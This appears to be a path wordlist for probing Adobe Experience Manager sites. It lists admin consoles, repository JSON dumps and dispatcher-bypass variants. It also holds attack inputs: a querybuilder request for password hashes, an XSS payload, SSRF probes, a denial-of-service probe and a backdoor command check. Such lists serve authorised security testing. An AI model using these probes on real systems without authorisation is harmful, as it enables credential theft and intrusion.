/libs/granite/core/content/login.html
/libs/cq/core/content/login.html
/crx/explorer/index.jsp
/crx/packmgr/index.jsp
/bin/querybuilder.json?type=rep:User&p.hits=selective&p.properties=rep:principalName%20rep:password&p.limit=100
/.json
/.1.json
/.tidy.6.json
/.tidy.infinity.json
/bin.tidy.infinity.json
/bin/querybuilder.json
/apps.tidy.infinity.json
/var/classes.tidy.infinity.json
/content.json
/content.1.json
/content.infinity.json
/content.childrenlist.json
/content.ext.json
/content.xml
/content.1.xml
/content.feed.xml
/composer.json
/libs/cq/core/content/welcome.html
/siteadmin
/damadmin
/libs/cq/workflow/content/inbox.html
/crx/explorer/ui/search.jsp?Path=&Query=
/libs/cq/search/content/querydebug.html
/etc/clientcontext/default/content.html
/libs/cq/i18n/translator.html
/miscadmin
/libs/granite/backup/content/admin.html
/miscadmin#/etc/mobile
/miscadmin#/etc/blueprints
/miscadmin#/etc/designs
/libs/cq/tagging/content/tagadmin.html
/miscadmin#/etc/segmentation
/miscadmin#/etc/msm/rolloutconfigs
/damadmin#/content/dam
/miscadmin#/etc/importers
/etc/cloudservices.html
/crx/packmgr/index.jsp
/crx/packageshare
/crx/de
/system/console/profiler
/system/console/diskbenchmark
/libs/cq/workflow/content/console.html
/libs/cq/workflow/content/inbox.html
/etc/replication.html
/etc/replication/treeactivation.html
/etc/replication/agents.author.html
/etc/replication/agents.publish.html
/etc/replication/agents.publish/flush.html
/libs/cq/ui/content/dumplibs.html
/etc/reports/auditreport.html
/etc/reports/diskusage.html
/etc/reports/diskusage.html?path=/content/dam
/etc/reports/userreport.html
/crx/explorer/browser/index.jsp
/crx/explorer/nodetypes/index.jsp
/system/console/jmx/com.adobe.granite%3Atype%3DRepository
/libs/granite/cluster/content/admin.html
/system/console
/system/console?.css
/system/console/configMgr
/system/console/jmx/java.lang%3Atype%3DRuntime
/system/console/memoryusage
/system/console/vmstat
/system/console/productinfo
/system/console/profiler
/system/console/diskbenchmark
/libs/granite/backup/content/admin.html
/system/console/mimetypes
/system/console/licenses
/system/admin
/lc/content/ws
/workspace
/ReaderExtensions
/mobileformsivs
/lc/crx/packmgr/index.jsp
/lc/cm/
/adminui
/lc/system/console
/system/sling.js
/system/sling/info.sessionInfo.json
/system/sling/info.sessionInfo.txt
/jcr:content.json
/.infinity.json
/.xml
/.1.xml
/.feed.xml
/apps.json
/apps.1.json
/apps.feed.xml
/bin.json
/bin.1.json
/bin.infinity.json
/bin.childrenlist.json
/bin.ext.json
/bin.xml
/bin.1.xml
/bin.feed.xml
/etc.json
/etc.1.json
/etc.infinity.json
/etc.childrenlist.json
/etc/cloudsettings.-1.json
/etc.xml
/etc.1.xml
/etc.feed.xml
/home.json
/home.1.json
/home.infinity.json
/home.xml
/home.1.xml
/home.feed.xml
/libs.json
/libs.1.json
/libs.infinity.json
/libs.xml
/libs.1.xml
/libs.feed.xml
/var.json
/var.1.json
/var.infinity.json
/var.xml
/var.1.xml
/var.feed.xml
/var/classes.json
/var/classes.1.json
/var/classes.infinity.json
/var/classes.xml
/var/classes.1.xml
/var/classes.feed.xml
/system/sling/cqform/defaultlogin.html
/crx/de/index.jsp
/etc/packages
/content/geometrixx
/content/geometrixx-outdoors/en.html
/bin/querybuilder.json/a.css
/bin/querybuilder.json/a.html
/bin/querybuilder.json/a.ico
/bin/querybuilder.json/a.png
/bin/querybuilder.json;%0aa.css
/bin/querybuilder.json/a.1.json
/system/sling/loginstatus.json
/system/sling/loginstatus.css
/system/sling/loginstatus.png
/system/sling/loginstatus.gif
/system/sling/loginstatus.html
/system/sling/loginstatus.json/a.1.json
/system/sling/loginstatus.json;%0aa.css
/system/bgservlets/test.json
/system/bgservlets/test.css
/system/bgservlets/test.png
/system/bgservlets/test.gif
/system/bgservlets/test.html
/system/bgservlets/test.json/a.1.json
/system/bgservlets/test.json;%0aa.css
///bin///querybuilder.json
///bin///querybuilder.json.servlet
///bin///querybuilder.json/a.css
///bin///querybuilder.json.servlet/a.css
///bin///querybuilder.json/a.ico
///bin///querybuilder.json.servlet/a.ico
///bin///querybuilder.json;%0aa.css
///bin///querybuilder.json.servlet;%0aa.css
///bin///querybuilder.json/a.1.json
///bin///querybuilder.json.servlet/a.1.json
///bin///querybuilder.json.css
///bin///querybuilder.json.ico
///bin///querybuilder.json.html
///bin///querybuilder.json.png
///bin///querybuilder.feed.servlet
///bin///querybuilder.feed.servlet/a.css
///bin///querybuilder.feed.servlet/a.ico
///bin///querybuilder.feed.servlet;%0aa.css
///bin///querybuilder.feed.servlet/a.1.json
///bin///wcm/search/gql.servlet.json
///bin///wcm/search/gql.json
///bin///wcm/search/gql.json/a.1.json
///bin///wcm/search/gql.json;%0aa.css
///bin///wcm/search/gql.json/a.css
///bin///wcm/search/gql.json/a.ico
///bin///wcm/search/gql.json/a.png
///bin///wcm/search/gql.json/a.html
///system///sling/loginstatus.json
///system///sling/loginstatus.json/a.css
///system///sling/loginstatus.json/a.ico
////system///sling/loginstatus.json;%0aa.css
///system///sling/loginstatus.json/a.1.json
///system///sling/loginstatus.css
///system///sling/loginstatus.ico
///system///sling/loginstatus.png
///system///sling/loginstatus.html
/libs/cq/contentinsight/content/proxy.reportingservices.json
/libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
/libs/mcm/salesforce/customer.json
/libs/mcm/salesforce/customer.json?checkType=authorize&authorization_url=http://0.0.0.0&customer_key=zzzz&customer_secret=zzzz&redirect_uri=xxxx&code=e
/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet
/libs/cq/analytics/templates/sitecatalyst/jcr:content.segments.json
/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet?datacenter=https://site%23&company=xxx&username=zzz&secret=yyyy
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json/a.css
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json/a.html
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json/a.ico
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json/a.png
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json/a.gif
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json/a.1.json
/libs/cq/cloudservicesprovisioning/content/autoprovisioning.json;%0aa.css
/bin/wcm/contentfinder/connector/suggestions.json/a.html?query_term=path%3a/&pre=%3Csvg+onload%3dalert(document.domain)%3E&post=yyyy
/.ext.json
/.ext.infinity.json
/.ext.infinity.json?tidy=true
/bin/querybuilder.json?type=nt:base&p.limit=-1
/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix=
/content.assetsearch.json?query=*&start=0&limit=10&random=123
/..assetsearch.json?query=*&start=0&limit=10&random=123
/system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111
/content.ext.infinity.1..json?tidy=true
/libs/dam/cloud/proxy.json
/crx/repository/test
/.childrenlist.json
/content/usergenerated/etc/commerce/smartlists
/bin/backdoor.html?cmd=ifconfig
/libs/opensocial/proxy?.css
/etc/mobile/useragent-test.html
